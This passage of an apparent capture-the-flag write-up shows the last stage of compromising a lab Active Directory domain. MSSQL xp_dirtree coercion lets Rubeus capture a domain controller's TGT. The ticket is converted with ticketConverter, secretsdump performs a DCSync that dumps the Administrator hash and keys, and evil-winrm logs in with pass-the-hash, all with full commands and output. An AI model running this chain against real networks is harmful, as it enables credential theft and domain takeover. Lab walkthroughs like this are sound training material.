.\Rubeus.exe monitor /interval:5
#    ______        _
#   (_____ \      | |
#    _____) )_   _| |__  _____ _   _  ___
#   |  __  /| | | |  _ \| ___ | | | |/___)
#   | |  \ \| |_| | |_) ) ____| |_| |___ |
#   |_|   |_|____/|____/|_____)____/(___/
#
#   v2.3.3
#
# [*] Action: TGT Monitoring
# [*] Monitoring every 5 seconds for new TGTs

On first launch we see the TGTs for Administrator@DARKZERO.EXT, svc_sql and DC02$, so nothing really useful yet.

I tried a lot of things, including Linux coercion tools (petitpotam, dfscoerce); none worked. I suspect that DC02 being reached through ligolo might break these coercion attempts, so I looked for Windows alternatives and found SpoolSample.exe. Using it, we can perform the request and we see something happen in Inveigh, though again no TGT appears in the Rubeus logs. I'm not sure what is going on; it really seems to work, since Inveigh shows the requests arriving.

After a lot of testing I came back to MSSQL: maybe we can force DC01's own MSSQL service to perform the coercion via a UNC path. Note that this query is run without an AT clause, so it executes on DC01 itself (where mssqlclient is connected), not on the linked server. I tried this:

EXEC master..xp_dirtree '\\DC02.darkzero.ext\foobar';

And a couple of seconds later I saw the TGT appear in the Rubeus logs:

# [*] 2/15/2026 11:37:34 AM UTC - Found new TGT:
#
#   User                  :  DC01$@DARKZERO.HTB
#   StartTime             :  2/15/2026 11:33:53 AM
#   EndTime               :  2/15/2026 9:33:53 PM
#   RenewTill             :  2/22/2026 11:33:53 AM
#   Flags                 :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
#   Base64EncodedTicket   :
#
#     doIFjDCCBYigAwIBBaEDAgEWooIElDCCBJBhggSMMIIEiKADAgEFoQ4bDERBUktaRVJPLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRn
#     dBsMREFSS1pFUk8uSFRCo4IETDCCBEigAwIBEqEDAgECooIEOgSCBDZg1y1HMLsbUrDNAx1Jdt6h2TI27/LZxVK1tGrkhayDuJRm
# <SNIP>

From this we can decode the base64 to get the kirbi file, then use Impacket's ticketConverter to turn it into a ccache. Since DC01$ is the domain controller's machine account in DARKZERO.HTB, its TGT should let us DCSync that domain:

echo "doIFjDCCBYigAwI<SNIP>kVSTy5IVEI=" | tr -d '\n' | base64 -d > dc01.kirbi
ticketConverter.py -i dc01.kirbi -o dc01.ccache
# Impacket v0.13.0.dev0+20250717.182627.84ebce48 - Copyright Fortra, LLC and its affiliated companies
#
# [*] converting kirbi to ccache...
# [+] done
export KRB5CCNAME=dc01.ccache
faketime "$(rdate -n 10.129.3.164 -p | awk '{print $2, $3, $4}' | date -f - "+%Y-%m-%d %H:%M:%S")" zsh
secretsdump -k -no-pass 'DC01$@dc01.darkzero.htb' -dc-ip 10.129.3.164 -use-ntds -just-dc-user Administrator
# Impacket v0.13.0.dev0+20250717.182627.84ebce48 - Copyright Fortra, LLC and its affiliated companies
#
# [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
# [*] Using the DRSUAPI method to get NTDS.DIT secrets
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:5917507bdf2ef2c2b0a869a1cba40726:::
# [*] Kerberos keys grabbed
# Administrator:0x14:2f8efea2896670fa78f4da08a53c1ced59018a89b762cbcf6628bd290039b9cd
# Administrator:0x13:a23315d970fe9d556be03ab611730673
# Administrator:aes256-cts-hmac-sha1-96:d4aa4a338e44acd57b857fc4d650407ca2f9ac3d6f79c9de59141575ab16cabd
# Administrator:aes128-cts-hmac-sha1-96:b1e04b87abab7be2c600fc652ac84362
# Administrator:0x17:5917507bdf2ef2c2b0a869a1cba40726
# [*] Cleaning up...

We got it. Let's connect and get the flag:

evil-winrmexec "Administrator@DC01" -hashes ":5917507bdf2ef2c2b0a869a1cba40726"
# [*] '-target_ip' not specified, using DC01
# [*] '-port' not specified, using 5985
# [*] '-url' not specified, using http://DC01:5985/wsman
cd ../Desktop
dir
#     Directory: C:\Users\Administrator\Desktop
#
#
# Mode                 LastWriteTime         Length Name
# ----                 -------------         ------ ----
# -ar---         2/15/2026   8:57 AM             34 root.txt
# -ar---         2/15/2026   8:57 AM             34 user.txt

type root.txt
# <REDACATED>

Not sure why there's another user.txt there.